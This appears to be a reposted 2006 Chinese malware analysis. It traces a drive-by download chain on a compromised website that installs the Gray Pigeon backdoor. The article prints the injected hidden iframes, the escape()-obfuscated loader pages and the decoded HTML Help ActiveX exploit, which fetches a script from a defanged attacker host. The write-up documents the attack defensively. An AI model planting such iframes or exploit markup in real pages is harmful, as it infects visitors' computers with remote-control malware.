网页教学网
 当前位置: 网页教学网 >> 网络编程 >> ASP编程技术 >> 阅读:发现一个使用技术升级、下载灰鸽子的网站
[ HTML ] [ FW ] [ DW ] [ FP ] [ JS ] [ XML ] [ CSS ] [ 图象 ] [ FLASH ] [ .NET ] [ ASP ] [ JSP ] [ PHP ] [ 数据 ] [ 系统 ] [ 安全 ] [ 素材 ] [ 建站 ] [ 主机 ] [ 入门 ] [ 技巧 ]

发现一个使用技术升级、下载灰鸽子的网站

http://www.webjx.com  更新日期:2006-04-10 08:06  出处:CSDN  作者:

endurer 原创

2006-04-08 第2版 分析young.gif,确认young.css为灰鸽子
2006-04-07 第1

网站首页被插入恶意代码:

<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>


hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密,unescape()后为:

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'></iframe>
<iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'></iframe>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密,unescape()后为:

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=95
width=150 autostart=true>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉多余的起始空格):


<center><font color=red>对不起,您访问的页面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

此网页检查Windows版本,并打开相应的网页windows.htm、winnt.htm或w98.htm。

这与又一个自动下载病毒的政府网站中遇到的相似。


hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:


<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/windows/help/apps.chm');</OBJECT><OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"hxxp://www.***hyap98.com/rx/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

hxxp://www.***hyap98.com/rx/winnt.htm的部分内容经过escape()加密,unescape()并去掉多余的起始空格后为:


<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words="<SCRIPT language=VScript src="young.gif"></SCRIPT><SCRIPT language=VScript src="young.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="news571" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;/winnt/help/apps.chm');</OBJECT><OBJECT id="news577" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"hxxp://www.***hyap98.com/rx/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>news571.Click();f1=1+1;f1=f1+2;setTimeout("news577.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>"

function SetNewWords()
{
var NewWords;
NewWords=unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

hxxp://www.***hyap98.com/rx/w98.htm的大小为0。

hxxp://www.***hyap98.com/rx/young.css其实是个加过壳的PE可执行文件。


hxxp://www.***hyap98.com/rx/young.gif其实是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:\wins.bat,c:\boot.hta,C:\wins.exe。

关键词:
推荐给好友】【关闭】【收藏本文
最新五条评论
查看全部评论
评论总数 0
您的评论
用户名: 新注册) 密 码: 匿名:
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
站内搜索
标题作者内容

  热门关键字: HTML CSS 网页 动画 Photoshop Web标准 Web黑客 优化 入门 非主流 照片处理
相关文章
推荐文章
  1. Photoshop神功再现:抠出墨的流动效果
  2. 用DW制作网页时关于文字自动换行的小技巧
  3. 买完正版Vista机型却要改装盗版XP的悲哀
  4. 照片处理 Photoshop打造真实的铅笔素描画
  5. Photoshop照片合成实例教程:为照片添加烟花
  6. Photoshop制作用图片填充图片的错觉效果
  7. 完美曲线:Photoshop打造靓丽美女
  8. Photoshop把照片制作成泛黄色陈旧效果
  9. Photoshop简单把照片处理为逼真水彩画
  10. Photoshop红粉佳人教程:刘方肤色的最终破解
  11. Photoshop照片合成教程:制作好莱坞风格电影海
  12. 入门:Photoshop中把文字做为自定义形状使用
热点资讯
  1. 网站放弃SEO(搜索引擎优化)照样也能取得成功
  2. 新手学习如何制作Linux系统的安装光盘?
  3. 浅析Ubuntu Linux Server的用户安全问题
  4. Linux系统下的动态DNS服务配置方法详解
  5. 通过分析SQL语句的执行计划优化SQL(五)
  6. 安装SQL Server2K可能引发一个严重问题
  7. 快速解决SYBASE编程中所遇到的莫名错误
  8. 查出前台正在发出的sql语句的方法
  9. 巧用SQL的全局临时表防止用户重复登录
  10. 最影响Oracle系统性能有哪些初始化参数?
  11. 解析ASP与SQL server互操作的时间处理
  12. 通过分析SQL语句的执行计划优化SQL(六)